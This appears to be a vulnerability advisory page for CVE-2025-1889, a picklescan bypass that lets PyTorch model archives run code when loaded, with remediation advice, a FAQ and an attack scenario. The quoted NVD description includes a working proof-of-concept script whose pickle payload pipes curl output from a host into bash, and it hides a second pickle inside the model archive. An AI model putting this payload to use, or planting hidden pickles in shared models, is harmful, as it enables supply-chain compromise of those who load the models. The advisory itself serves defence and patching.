CVE-2025-1889: picklescan: extension bypass enables RCE on model load
GHSA-769v-p64c-89pr MEDIUM PoC AVAILABLEIf your ML pipelines use picklescan to gate PyTorch model ingestion, that gate is broken. Attackers can publish models on Hugging Face or internal registries that pass picklescan cleanly but execute arbitrary code at load time. Upgrade picklescan to 0.0.22 immediately and enforce safetensors format for all externally-sourced models going forward.
Risk Assessment
High operational risk despite the medium CVSS rating. This vulnerability targets a security control organizations explicitly deploy to detect malicious models — making bypass particularly dangerous because it creates a false sense of protection. A public PoC exists and the attack is reproducible by anyone with basic ML knowledge. EPSS of 0.00036 reflects early disclosure, not real-world exploitation likelihood in targeted ML supply chain attacks. Organizations in regulated industries running AI workloads should treat this as high priority.
Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| picklescan | pip | <= 0.0.21 | 0.0.22 |
Do you use picklescan? You're affected.
Severity & Risk
Recommended Action
1 step-
1) Upgrade picklescan to >= 0.0.22 immediately — this is the only direct patch. 2) Migrate to safetensors format for all model distribution and loading — eliminates pickle deserialization risk entirely. 3) Enforce weights_only=True in all torch.load() calls across codebases; this blocks non-tensor object deserialization. 4) Augment scanning with magic byte detection (\x80\x05) rather than relying on file extensions — inspect all files in model ZIP archives regardless of extension. 5) Implement model signing and hash verification before loading any externally sourced model. 6) Audit CI/CD pipelines for automatic model downloads without scan checkpoints and add static analysis to detect torch.load(pickle_file=...) call patterns in bundled pickle files.
CISA SSVC Assessment
Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
Classification
Compliance Impact
This CVE is relevant to:
Frequently Asked Questions
What is CVE-2025-1889?
If your ML pipelines use picklescan to gate PyTorch model ingestion, that gate is broken. Attackers can publish models on Hugging Face or internal registries that pass picklescan cleanly but execute arbitrary code at load time. Upgrade picklescan to 0.0.22 immediately and enforce safetensors format for all externally-sourced models going forward.
Is CVE-2025-1889 actively exploited?
Proof-of-concept exploit code is publicly available for CVE-2025-1889, increasing the risk of exploitation.
How to fix CVE-2025-1889?
1) Upgrade picklescan to >= 0.0.22 immediately — this is the only direct patch. 2) Migrate to safetensors format for all model distribution and loading — eliminates pickle deserialization risk entirely. 3) Enforce weights_only=True in all torch.load() calls across codebases; this blocks non-tensor object deserialization. 4) Augment scanning with magic byte detection (\x80\x05) rather than relying on file extensions — inspect all files in model ZIP archives regardless of extension. 5) Implement model signing and hash verification before loading any externally sourced model. 6) Audit CI/CD pipelines for automatic model downloads without scan checkpoints and add static analysis to detect torch.load(pickle_file=...) call patterns in bundled pickle files.
What systems are affected by CVE-2025-1889?
This vulnerability affects the following AI/ML architecture patterns: training pipelines, model serving, MLOps pipelines, model registries.
What is the CVSS score for CVE-2025-1889?
No CVSS score has been assigned yet.
Technical Details
NVD Description
### CVE-2025-1889 ### Summary Picklescan fails to detect hidden pickle files embedded in PyTorch model archives due to its reliance on file extensions for detection. This allows an attacker to embed a secondary, malicious pickle file with a non-standard extension inside a model archive, which remains undetected by picklescan but is still loaded by PyTorch's torch.load() function. This can lead to arbitrary code execution when the model is loaded. ### Details Picklescan primarily identifies pickle files by their extensions (e.g., .pkl, .pt). However, PyTorch allows specifying an alternative pickle file inside a model archive using the pickle_file parameter when calling torch.load(). This makes it possible to embed a malicious pickle file (e.g., config.p) inside the model while keeping the primary data.pkl file benign. A typical attack works as follows: - A PyTorch model (model.pt) is created and saved normally. - A second pickle file (config.p) containing a malicious payload is crafted. - The data.pkl file in the model is modified to contain an object that calls torch.load(model.pt, pickle_file='config.p'), causing config.p to be loaded when the model is opened. - Since picklescan ignores non-standard extensions, it does not scan config.p, allowing the malicious payload to evade detection. - The issue is exacerbated by the fact that PyTorch models are widely shared in ML repositories and organizations, making it a potential supply-chain attack vector. ### PoC ``` import os import pickle import torch import zipfile from functools import partial class RemoteCodeExecution: def __reduce__(self): return os.system, ("curl -s http://localhost:8080 | bash",) # Create a directory inside the model os.makedirs("model", exist_ok=True) # Create a hidden malicious pickle file with open("model/config.p", "wb") as f: pickle.dump(RemoteCodeExecution(), f) # Create a benign model model = {} class AutoLoad: def __init__(self, path, **kwargs): self.path = path self.kwargs = kwargs def __reduce__(self): # Use functools.partial to create a partially applied function # with torch.load and the pickle_file argument return partial(torch.load, self.path, **self.kwargs), () model['config'] = AutoLoad(model_name, pickle_file='config.p', weights_only=False) torch.save(model, "model.pt") # Inject the second pickle into the model archive with zipfile.ZipFile("model.pt", "a") as archive: archive.write("model/config.p", "model/config.p") # Loading the model triggers execution of config.p torch.load("model.pt") ``` ### Impact Severity: High Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models. What is the impact? Attackers can embed malicious code in PyTorch models that remains undetected but executes when the model is loaded. Potential Exploits: This vulnerability could be exploited in supply chain attacks, backdooring pre-trained models distributed via repositories like Hugging Face or PyTorch Hub. ### Recommendations 1. Scan All Files in the ZIP Archive: picklescan should analyze all files in the archive instead of relying on file extensions. 2. Detect Hidden Pickle References: Static analysis should detect torch.load(pickle_file=...) calls inside data.pkl. 3. Magic Byte Detection: Instead of relying on extensions, picklescan should inspect file contents for pickle magic bytes (\x80\x05). 4. Block the following globals: - torch.load - Block functools.partial
Exploitation Scenario
Adversary creates a legitimate-looking PyTorch model and publishes it to Hugging Face. The primary data.pkl is benign and passes picklescan. A secondary file config.p — containing a reverse shell payload via os.system — is embedded in the ZIP archive with no flagged extension. The data.pkl contains a self-referential torch.load() call pointing to config.p. Target organization's MLOps pipeline downloads the model, runs picklescan (passes — config.p is ignored), then calls torch.load() during evaluation or fine-tuning. The hidden config.p executes, giving the attacker a foothold on the ML worker node. In cloud environments, this node typically carries attached IAM credentials with broad permissions for model artifact storage and training job invocation.
References
- github.com/advisories/GHSA-769v-p64c-89pr
- github.com/mmaitre314/picklescan/commit/baf03faf88fece56a89534d12ce048e5ee36e50e
- github.com/mmaitre314/picklescan/security/advisories/GHSA-769v-p64c-89pr
- nvd.nist.gov/vuln/detail/CVE-2025-1889
- sites.google.com/sonatype.com/vulnerabilities/cve-2025-1889
- github.com/fkie-cad/nvd-json-data-feeds Exploit
Timeline
Related Vulnerabilities
GHSA-vvpj-8cmc-gx39 10.0 picklescan: security flaw enables exploitation
Same package: picklescan GHSA-g38g-8gr9-h9xp 9.8 picklescan: Allowlist Bypass evades input filtering
Same package: picklescan GHSA-7wx9-6375-f5wh 9.8 picklescan: Allowlist Bypass evades input filtering
Same package: picklescan CVE-2025-1945 9.8 picklescan: ZIP flag bypass enables RCE in PyTorch models
Same package: picklescan GHSA-hgrh-qx5j-jfwx 8.8 picklescan: Protection Bypass circumvents security controls
Same package: picklescan
AI Threat Alert